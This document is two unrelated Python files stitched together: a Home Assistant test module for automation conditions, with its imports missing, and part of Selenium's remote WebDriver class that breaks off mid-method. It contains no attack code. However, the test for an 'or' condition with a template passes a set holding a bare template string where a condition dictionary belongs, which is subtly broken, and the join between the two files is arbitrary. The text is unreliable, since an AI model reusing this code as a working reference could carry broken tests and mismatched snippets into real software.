from homeassistant.setup import async_setup_component
from homeassistant.util import dt
from tests.async_mock import patch
async def test_invalid_condition(hass):
"""Test if invalid condition raises."""
with pytest.raises(HomeAssistantError):
await condition.async_from_config(
hass,
{
"condition": "invalid",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
],
},
)
async def test_and_condition(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_and_condition_with_template(hass):
"""Test the 'and' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_or_condition(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_or_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "or",
"conditions": [
{'{{ states.sensor.temperature.state == "100" }}'},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 110,
},
],
},
)
hass.states.async_set("sensor.temperature", 120)
assert not test(hass)
hass.states.async_set("sensor.temperature", 105)
assert test(hass)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
async def test_not_condition(hass):
"""Test the 'not' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
async def test_not_condition_with_template(hass):
"""Test the 'or' condition."""
test = await condition.async_from_config(
hass,
{
"condition": "not",
"conditions": [
{
"condition": "template",
"value_template": '{{ states.sensor.temperature.state == "100" }}',
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 101)
assert test(hass)
hass.states.async_set("sensor.temperature", 50)
assert test(hass)
hass.states.async_set("sensor.temperature", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
async def test_time_window(hass):
"""Test time condition windows."""
sixam = dt.parse_time("06:00:00")
sixpm = dt.parse_time("18:00:00")
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=3),
):
assert not condition.time(hass, after=sixam, before=sixpm)
assert condition.time(hass, after=sixpm, before=sixam)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=9),
):
assert condition.time(hass, after=sixam, before=sixpm)
assert not condition.time(hass, after=sixpm, before=sixam)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=15),
):
assert condition.time(hass, after=sixam, before=sixpm)
assert not condition.time(hass, after=sixpm, before=sixam)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=21),
):
assert not condition.time(hass, after=sixam, before=sixpm)
assert condition.time(hass, after=sixpm, before=sixam)
async def test_time_using_input_datetime(hass):
"""Test time conditions using input_datetime entities."""
await async_setup_component(
hass,
"input_datetime",
{
"input_datetime": {
"am": {"has_date": True, "has_time": True},
"pm": {"has_date": True, "has_time": True},
}
},
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.am",
"datetime": str(
dt.now()
.replace(hour=6, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
await hass.services.async_call(
"input_datetime",
"set_datetime",
{
"entity_id": "input_datetime.pm",
"datetime": str(
dt.now()
.replace(hour=18, minute=0, second=0, microsecond=0)
.replace(tzinfo=None)
),
},
blocking=True,
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=3),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=9),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=15),
):
assert condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert not condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
with patch(
"homeassistant.helpers.condition.dt_util.now",
return_value=dt.now().replace(hour=21),
):
assert not condition.time(
hass, after="input_datetime.am", before="input_datetime.pm"
)
assert condition.time(
hass, after="input_datetime.pm", before="input_datetime.am"
)
assert not condition.time(hass, after="input_datetime.not_existing")
assert not condition.time(hass, before="input_datetime.not_existing")
async def test_if_numeric_state_not_raise_on_unavailable(hass):
"""Test numeric_state doesn't raise on unavailable/unknown state."""
test = await condition.async_from_config(
hass,
{"condition": "numeric_state", "entity_id": "sensor.temperature", "below": 42},
)
with patch("homeassistant.helpers.condition._LOGGER.warning") as logwarn:
hass.states.async_set("sensor.temperature", "unavailable")
assert not test(hass)
assert len(logwarn.mock_calls) == 0
hass.states.async_set("sensor.temperature", "unknown")
assert not test(hass)
assert len(logwarn.mock_calls) == 0
async def test_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"state": "100",
},
],
},
)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 100)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 101)
hass.states.async_set("sensor.temperature_2", 100)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 100)
hass.states.async_set("sensor.temperature_2", 101)
assert not test(hass)
async def test_multiple_states(hass):
"""Test with multiple states in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": ["100", "200"],
},
],
},
)
hass.states.async_set("sensor.temperature", 100)
assert test(hass)
hass.states.async_set("sensor.temperature", 200)
assert test(hass)
hass.states.async_set("sensor.temperature", 42)
assert not test(hass)
async def test_state_attribute(hass):
"""Test with state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"state": 200,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 200})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 200})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "200"})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 201})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
assert not test(hass)
async def test_state_attribute_boolean(hass):
"""Test with boolean state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "state",
"entity_id": "sensor.temperature",
"attribute": "happening",
"state": False,
},
)
hass.states.async_set("sensor.temperature", 100, {"happening": 200})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": True})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"no_happening": 201})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"happening": False})
assert test(hass)
async def test_state_using_input_entities(hass):
"""Test state conditions using input_* entities."""
await async_setup_component(
hass,
"input_text",
{
"input_text": {
"hello": {"initial": "goodbye"},
}
},
)
await async_setup_component(
hass,
"input_select",
{
"input_select": {
"hello": {"options": ["cya", "goodbye", "welcome"], "initial": "cya"},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.salut",
"state": [
"input_text.hello",
"input_select.hello",
"input_number.not_exist",
"salut",
],
},
],
},
)
hass.states.async_set("sensor.salut", "goodbye")
assert test(hass)
hass.states.async_set("sensor.salut", "salut")
assert test(hass)
hass.states.async_set("sensor.salut", "hello")
assert not test(hass)
await hass.services.async_call(
"input_text",
"set_value",
{
"entity_id": "input_text.hello",
"value": "hi",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "hi")
assert test(hass)
hass.states.async_set("sensor.salut", "cya")
assert test(hass)
await hass.services.async_call(
"input_select",
"select_option",
{
"entity_id": "input_select.hello",
"option": "welcome",
},
blocking=True,
)
assert not test(hass)
hass.states.async_set("sensor.salut", "welcome")
assert test(hass)
async def test_numeric_state_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_1", "sensor.temperature_2"],
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 49)
assert test(hass)
hass.states.async_set("sensor.temperature_1", 50)
hass.states.async_set("sensor.temperature_2", 49)
assert not test(hass)
hass.states.async_set("sensor.temperature_1", 49)
hass.states.async_set("sensor.temperature_2", 50)
assert not test(hass)
async def test_numberic_state_attribute(hass):
"""Test with numeric state attribute in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"attribute": "attribute1",
"below": 50,
},
],
},
)
hass.states.async_set("sensor.temperature", 100, {"unkown_attr": 10})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 49})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": "49"})
assert test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": 51})
assert not test(hass)
hass.states.async_set("sensor.temperature", 100, {"attribute1": None})
assert not test(hass)
async def test_numeric_state_using_input_number(hass):
"""Test numeric_state conditions using input_number entities."""
await async_setup_component(
hass,
"input_number",
{
"input_number": {
"low": {"min": 0, "max": 255, "initial": 10},
"high": {"min": 0, "max": 255, "initial": 100},
}
},
)
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "numeric_state",
"entity_id": "sensor.temperature",
"below": "input_number.high",
"above": "input_number.low",
},
],
},
)
hass.states.async_set("sensor.temperature", 42)
assert test(hass)
hass.states.async_set("sensor.temperature", 10)
assert not test(hass)
hass.states.async_set("sensor.temperature", 100)
assert not test(hass)
await hass.services.async_call(
"input_number",
"set_value",
{
"entity_id": "input_number.high",
"value": 101,
},
blocking=True,
)
assert test(hass)
assert not condition.async_numeric_state(
hass, entity="sensor.temperature", below="input_number.not_exist"
)
assert not condition.async_numeric_state(
hass, entity="sensor.temperature", above="input_number.not_exist"
)
async def test_zone_multiple_entities(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "zone",
"entity_id": ["device_tracker.person_1", "device_tracker.person_2"],
"zone": "zone.home",
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 20.1, "longitude": 10.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 2.1, "longitude": 1.1},
)
assert not test(hass)
hass.states.async_set(
"device_tracker.person_1",
"home",
{"friendly_name": "person_1", "latitude": 2.1, "longitude": 1.1},
)
hass.states.async_set(
"device_tracker.person_2",
"home",
{"friendly_name": "person_2", "latitude": 20.1, "longitude": 10.1},
)
assert not test(hass)
async def test_multiple_zones(hass):
"""Test with multiple entities in condition."""
test = await condition.async_from_config(
hass,
{
"condition": "and",
"conditions": [
{
"condition": "zone",
"entity_id": "device_tracker.person",
"zone": ["zone.home", "zone.work"],
},
],
},
)
hass.states.async_set(
"zone.home",
"zoning",
{"name": "home", "latitude": 2.1, "longitude": 1.1, "radius": 10},
)
hass.states.async_set(
"zone.work",
"zoning",
{"name": "work", "latitude": 20.1, "longitude": 10.1, "radius": 10},
)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 2.1, "longitude": 1.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 20.1, "longitude": 10.1},
)
assert test(hass)
hass.states.async_set(
"device_tracker.person",
"home",
{"friendly_name": "person", "latitude": 50.1, "longitude": 20.1},
)
assert not test(hass)
async def test_extract_entities():
"""Test extracting entities."""
assert condition.async_extract_entities(
{
"condition": "and",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_2",
"below": 110,
},
{
"condition": "not",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_3",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_4",
"below": 110,
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "state",
"entity_id": "sensor.temperature_5",
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": "sensor.temperature_6",
"below": 110,
},
],
},
{
"condition": "state",
"entity_id": ["sensor.temperature_7", "sensor.temperature_8"],
"state": "100",
},
{
"condition": "numeric_state",
"entity_id": ["sensor.temperature_9", "sensor.temperature_10"],
"below": 110,
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
) == {
"sensor.temperature",
"sensor.temperature_2",
"sensor.temperature_3",
"sensor.temperature_4",
"sensor.temperature_5",
"sensor.temperature_6",
"sensor.temperature_7",
"sensor.temperature_8",
"sensor.temperature_9",
"sensor.temperature_10",
}
async def test_extract_devices():
"""Test extracting devices."""
assert (
condition.async_extract_devices(
{
"condition": "and",
"conditions": [
{"condition": "device", "device_id": "abcd", "domain": "light"},
{"condition": "device", "device_id": "qwer", "domain": "switch"},
{
"condition": "state",
"entity_id": "sensor.not_a_device",
"state": "100",
},
{
"condition": "not",
"conditions": [
{
"condition": "device",
"device_id": "abcd_not",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_not",
"domain": "switch",
},
],
},
{
"condition": "or",
"conditions": [
{
"condition": "device",
"device_id": "abcd_or",
"domain": "light",
},
{
"condition": "device",
"device_id": "qwer_or",
"domain": "switch",
},
],
},
Template("{{ is_state('light.example', 'on') }}"),
],
}
)
== {"abcd", "qwer", "abcd_not", "qwer_not", "abcd_or", "qwer_or"}
)
async def test_condition_template_error(hass, caplog):
"""Test invalid template."""
caplog.set_level(ERROR)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ undefined.state }}"}
)
assert not test(hass)
assert len(caplog.records) == 1
assert caplog.records[0].message.startswith(
"Error during template condition: UndefinedError:"
)
async def test_condition_template_invalid_results(hass):
"""Test template condition render false with invalid results."""
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 'string' }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 10.1 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ 42 }}"}
)
assert not test(hass)
test = await condition.async_from_config(
hass, {"condition": "template", "value_template": "{{ [1, 2, 3] }}"}
)
assert not test(hass)
|
|
# Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""The WebDriver implementation."""
import base64
import warnings
from .command import Command
from .webelement import WebElement
from .remote_connection import RemoteConnection
from .errorhandler import ErrorHandler
from .switch_to import SwitchTo
from .mobile import Mobile
from .file_detector import FileDetector, LocalFileDetector
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import InvalidSelectorException
from selenium.webdriver.common.by import By
from selenium.webdriver.common.html5.application_cache import ApplicationCache
try:
str = basestring
except NameError:
pass
class WebDriver(object):
"""
Controls a browser by sending commands to a remote server.
This server is expected to be running the WebDriver wire protocol
as defined at
https://github.com/SeleniumHQ/selenium/wiki/JsonWireProtocol
:Attributes:
- session_id - String ID of the browser session started and controlled by this WebDriver.
- capabilities - Dictionaty of effective capabilities of this browser session as returned
by the remote server. See https://github.com/SeleniumHQ/selenium/wiki/DesiredCapabilities
- command_executor - remote_connection.RemoteConnection object used to execute commands.
- error_handler - errorhandler.ErrorHandler object used to handle errors.
"""
def __init__(self, command_executor='http://127.0.0.1:4444/wd/hub',
desired_capabilities=None, browser_profile=None, proxy=None, keep_alive=False):
"""
Create a new driver that will issue commands using the wire protocol.
:Args:
- command_executor - Either a string representing URL of the remote server or a custom
remote_connection.RemoteConnection object. Defaults to 'http://127.0.0.1:4444/wd/hub'.
- desired_capabilities - A dictionary of capabilities to request when
starting the browser session. Required parameter.
- browser_profile - A selenium.webdriver.firefox.firefox_profile.FirefoxProfile object.
Only used if Firefox is requested. Optional.
- proxy - A selenium.webdriver.common.proxy.Proxy object. The browser session will
be started with given proxy settings, if possible. Optional.
- keep_alive - Whether to configure remote_connection.RemoteConnection to use
HTTP keep-alive. Defaults to False.
"""
if desired_capabilities is None:
raise WebDriverException("Desired Capabilities can't be None")
if not isinstance(desired_capabilities, dict):
raise WebDriverException("Desired Capabilities must be a dictionary")
if proxy is not None:
proxy.add_to_capabilities(desired_capabilities)
self.command_executor = command_executor
if type(self.command_executor) is bytes or isinstance(self.command_executor, str):
self.command_executor = RemoteConnection(command_executor, keep_alive=keep_alive)
self._is_remote = True
self.session_id = None
self.capabilities = {}
self.error_handler = ErrorHandler()
self.start_client()
self.start_session(desired_capabilities, browser_profile)
self._switch_to = SwitchTo(self)
self._mobile = Mobile(self)
self.file_detector = LocalFileDetector()
@property
def mobile(self):
return self._mobile
@property
def name(self):
"""Returns the name of the underlying browser for this instance.
:Usage:
- driver.name
"""
if 'browserName' in self.capabilities:
return self.capabilities['browserName']
else:
raise KeyError('browserName not specified in session capabilities')
def start_client(self):
"""
Called before starting a new session. This method may be overridden
to define custom startup behavior.
"""
pass
def stop_client(self):
"""
Called after executing a quit command. This method may be overridden
to define custom shutdown behavior.
"""
pass
def start_session(self, desired_capabilities, browser_profile=None):
"""
Creates a new session with the desired capabilities.
:Args:
- browser_name - The name of the browser to request.
- version - Which browser version to request.
- platform - Which platform to request the browser on.
- javascript_enabled - Whether the new session should support JavaScript.
- browser_profile - A selenium.webdriver.firefox.firefox_profile.FirefoxProfile object. Only used if Firefox is requested.
"""
if browser_profile:
desired_capabilities['firefox_profile'] = browser_profile.encoded
response = self.execute(Command.NEW_SESSION, {
'desiredCapabilities': desired_capabilities,
})
self.session_id = response['sessionId']
self.capabilities = response['value']
# Quick check to see if we have a W3C Compliant browser
self.w3c = "takesElementScreenshot" in self.capabilities
def _wrap_value(self, value):
if isinstance(value, dict):
converted = {}
for key, val in value.items():
converted[key] = self._wrap_value(val)
return converted
elif isinstance(value, WebElement):
return {'ELEMENT': value.id, 'element-6066-11e4-a52e-4f735466cecf': value.id}
elif isinstance(value, list):
return list(self._wrap_value(item) for item in value)
else:
return value
def create_web_element(self, element_id):
"""
Creates a web element with the specified element_id.
"""
return WebElement(self, element_id, w3c=self.w3c)
def _unwrap_value(self, value):
if isinstance(value, dict) and ('ELEMENT' in value or 'element-6066-11e4-a52e-4f735466cecf' in value):
wrapped_id = value.get('ELEMENT', None)
if wrapped_id:
return self.create_web_element(value['ELEMENT'])
else:
return self.create_web_element(value['element-6066-11e4-a52e-4f735466cecf'])
elif isinstance(value, list):
return list(self._unwrap_value(item) for item in value)
else:
return value
def execute(self, driver_command, params=None):
"""
Sends a command to be executed by a command.CommandExecutor.
:Args:
- driver_command: The name of the command to execute as a string.
- params: A dictionary of named parameters to send with the command.
:Returns:
The command's JSON response loaded into a dictionary object.
"""
if self.session_id is not None:
if not params:
params = {'sessionId': self.session_id}
elif 'sessionId' not in params:
params['sessionId'] = self.session_id
params = self._wrap_value(params)
response = self.command_executor.execute(driver_command, params)
if response:
self.error_handler.check_response(response)
response['value'] = self._unwrap_value(
response.get('value', None))
return response
# If the server doesn't send a response, assume the command was
# a success
return {'success': 0, 'value': None, 'sessionId': self.session_id}
def get(self, url):
"""
Loads a web page in the current browser session.
"""
self.execute(Command.GET, {'url': url})
@property
def title(self):
"""Returns the title of the current page.
:Usage:
driver.title
"""
resp = self.execute(Command.GET_TITLE)
return resp['value'] if resp['value'] is not None else ""
def find_element_by_id(self, id_):
"""Finds an element by id.
:Args:
- id\_ - The id of the element to be found.
:Usage:
driver.find_element_by_id('foo')
"""
return self.find_element(by=By.ID, value=id_)
def find_elements_by_id(self, id_):
"""
Finds multiple elements by id.
:Args:
- id\_ - The id of the elements to be found.
:Usage:
driver.find_element_by_id('foo')
"""
return self.find_elements(by=By.ID, value=id_)
def find_element_by_xpath(self, xpath):
"""
Finds an element by xpath.
:Args:
- xpath - The xpath locator of the element to find.
:Usage:
driver.find_element_by_xpath('//div/td[1]')
"""
return self.find_element(by=By.XPATH, value=xpath)
def find_elements_by_xpath(self, xpath):
"""
Finds multiple elements by xpath.
:Args:
- xpath - The xpath locator of the elements to be found.
:Usage:
driver.find_elements_by_xpath("//div[contains(@class, 'foo')]")
"""
return self.find_elements(by=By.XPATH, value=xpath)
def find_element_by_link_text(self, link_text):
"""
Finds an element by link text.
:Args:
- link_text: The text of the element to be found.
:Usage:
driver.find_element_by_link_text('Sign In')
"""
return self.find_element(by=By.LINK_TEXT, value=link_text)
def find_elements_by_link_text(self, text):
"""
Finds elements by link text.
:Args:
- link_text: The text of the elements to be found.
:Usage:
driver.find_elements_by_link_text('Sign In')
"""
return self.find_elements(by=By.LINK_TEXT, value=text)
def find_element_by_partial_link_text(self, link_text):
"""
Finds an element by a partial match of its link text.
:Args:
- link_text: The text of the element to partially match on.
:Usage:
driver.find_element_by_partial_link_text('Sign')
"""
return self.find_element(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_elements_by_partial_link_text(self, link_text):
"""
Finds elements by a partial match of their link text.
:Args:
- link_text: The text of the element to partial match on.
:Usage:
driver.find_element_by_partial_link_text('Sign')
"""
return self.find_elements(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_element_by_name(self, name):
"""
Finds an element by name.
:Args:
- name: The name of the element to find.
:Usage:
driver.find_element_by_name('foo')
"""
return self.find_element(by=By.NAME, value=name)
def find_elements_by_name(self, name):
"""
Finds elements by name.
:Args:
- name: The name of the elements to find.
:Usage:
driver.find_elements_by_name('foo')
"""
return self.find_elements(by=By.NAME, value=name)
def find_element_by_tag_name(self, name):
"""
Finds an element by tag name.
:Args:
- name: The tag name of the element to find.
:Usage:
driver.find_element_by_tag_name('foo')
"""
return self.find_element(by=By.TAG_NAME, value=name)
def find_elements_by_tag_name(self, name):
"""
Finds elements by tag name.
:Args:
- name: The tag name the use when finding elements.
:Usage:
driver.find_elements_by_tag_name('foo')
"""
return self.find_elements(by=By.TAG_NAME, value=name)
def find_element_by_class_name(self, name):
"""
Finds an element by class name.
:Args:
- name: The class name of the element to find.
:Usage:
driver.find_element_by_class_name('foo')
"""
return self.find_element(by=By.CLASS_NAME, value=name)
def find_elements_by_class_name(self, name):
"""
Finds elements by class name.
:Args:
- name: The class name of the elements to find.
:Usage:
driver.find_elements_by_class_name('foo')
"""
return self.find_elements(by=By.CLASS_NAME, value=name)
def find_element_by_css_selector(self, css_selector):
"""
Finds an element by css selector.
:Args:
- css_selector: The css selector to use when finding elements.
:Usage:
driver.find_element_by_css_selector('#foo')
"""
return self.find_element(by=By.CSS_SELECTOR, value=css_selector)
def find_elements_by_css_selector(self, css_selector):
"""
Finds elements by css selector.
:Args:
- css_selector: The css selector to use when finding elements.
:Usage:
driver.find_elements_by_css_selector('.foo')
"""
return self.find_elements(by=By.CSS_SELECTOR, value=css_selector)
def execute_script(self, script, *args):
"""
Synchronously Executes JavaScript in the current window/frame.
:Args:
- script: The JavaScript to execute.
- \*args: Any applicable arguments for your JavaScript.
:Usage:
driver.execute_script('document.title')
"""
converted_args = list(args)
return self.execute(Command.EXECUTE_SCRIPT,
{'script': script, 'args':converted_args})['value']
def execute_async_script(self, script, *args):
"""
Asynchronously Executes JavaScript in the current window/frame.
:Args:
- script: The JavaScript to execute.
- \*args: Any applicable arguments for your JavaScript.
:Usage:
driver.execute_async_script('document.title')
"""
converted_args = list(args)
return self.execute(Command.EXECUTE_ASYNC_SCRIPT,
{'script': script, 'args':converted_args})['value']
@property
def current_url(self):
"""
Gets the URL of the current page.
:Usage:
driver.current_url
"""
return self.execute(Command.GET_CURRENT_URL)['value']
@property
def page_source(self):
"""
Gets the source of the current page.
:Usage:
driver.page_source
"""
return self.execute(Command.GET_PAGE_SOURCE)['value']
def close(self):
"""
Closes the current window.
:Usage:
driver.close()
"""
self.execute(Command.CLOSE)
def quit(self):
"""
Quits the driver and closes every associated window.
:Usage:
driver.quit()
"""
try:
self.execute(Command.QUIT)
finally:
self.stop_client()
@property
def current_window_handle(self):
"""
Returns the handle of the current window.
:Usage:
driver.current_window_handle
"""
return self.execute(Command.GET_CURRENT_WINDOW_HANDLE)['value']
@property
def window_handles(self):
"""
Returns the handles of all windows within the current session.
:Usage:
driver.window_handles
"""
return self.execute(Command.GET_WINDOW_HANDLES)['value']
def maximize_window(self):
"""
Maximizes the current window that webdriver is using
"""
command = Command.MAXIMIZE_WINDOW
if self.w3c:
command = Command.W3C_MAXIMIZE_WINDOW
self.execute(command, {"windowHandle": "current"})
@property
def switch_to(self):
return self._switch_to
#Target Locators
def switch_to_active_element(self):
""" Deprecated use driver.switch_to.active_element
"""
warnings.warn("use driver.switch_to.active_element instead", DeprecationWarning)
return self._switch_to.active_element
def switch_to_window(self, window_name):
""" Deprecated use driver.switch_to.window
"""
warnings.warn("use driver.switch_to.window instead", DeprecationWarning)
self._switch_to.window(window_name)
def switch_to_frame(self, frame_reference):
""" Deprecated use driver.switch_to.frame
"""
warnings.warn("use driver.switch_to.frame instead", DeprecationWarning)
self._switch_to.frame(frame_reference)
def switch_to_default_content(self):
""" Deprecated use driver.switch_to.default_content
"""
warnings.warn("use driver.switch_to.default_content instead", DeprecationWarning)
self._switch_to.default_content()
def switch_to_alert(self):
""" Deprecated use driver.switch_to.alert
"""
warnings.warn("use driver.switch_to.alert instead", DeprecationWarning)
return self._switch_to.alert
#Navigation
def back(self):
"""
Goes one step backward in the browser history.
:Usage:
driver.back()
"""
self.execute(Command.GO_BACK)
def forward(self):
"""
Goes one step forward in the browser history.
:Usage:
driver.forward()
"""
self.execute(Command.GO_FORWARD)
def refresh(self):
"""
Refreshes the current page.
:Usage:
driver.refresh()
"""
self.execute(Command.REFRESH)
# Options
def get_cookies(self):
"""
Returns a set of dictionaries, corresponding to cookies visible in the current session.
:Usage:
driver.get_cookies()
"""
return self.execute(Command.GET_ALL_COOKIES)['value']
def get_cookie(self, name):
"""
Get a single cookie by name. Returns the cookie if found, None if not.
:Usage:
driver.get_cookie('my_cookie')
"""
cookies = self.get_cookies()
for cookie in cookies:
if cookie['name'] == name:
return cookie
return None
def delete_cookie(self, name):
"""
Deletes a single cookie with the given name.
:Usage:
driver.delete_cookie('my_cookie')
"""
self.execute(Command.DELETE_COOKIE, {'name': name})
def delete_all_cookies(self):
"""
Delete all cookies in the scope of the session.
:Usage:
driver.delete_all_cookies()
"""
self.execute(Command.DELETE_ALL_COOKIES)
def add_cookie(self, cookie_dict):
"""
Adds a cookie to your current session.
:Args:
- cookie_dict: A dictionary object, with required keys - "name" and "value";
optional keys - "path", "domain", "secure", "expiry"
Usage:
driver.add_cookie({'name' : 'foo', 'value' : 'bar'})
driver.add_cookie({'name' : 'foo', 'value' : 'bar', 'path' : '/'})
driver.add_cookie({'name' : 'foo', 'value' : 'bar', 'path' : '/', 'secure':True})
"""
self.execute(Command.ADD_COOKIE, {'cookie': cookie_dict})
# Timeouts
def implicitly_wait(self, time_to_wait):
"""
Sets a sticky timeout to implicitly wait for an element to be found,
or a command to complete. This method only needs to be called one
time per session. To set the timeout for calls to
execute_async_script, see set_script_timeout.
:Args:
- time_to_wait: Amount of time to wait (in seconds)
:Usage:
driver.implicitly_wait(30)
"""
if self.w3c:
self.execute(Command.SET_TIMEOUTS,
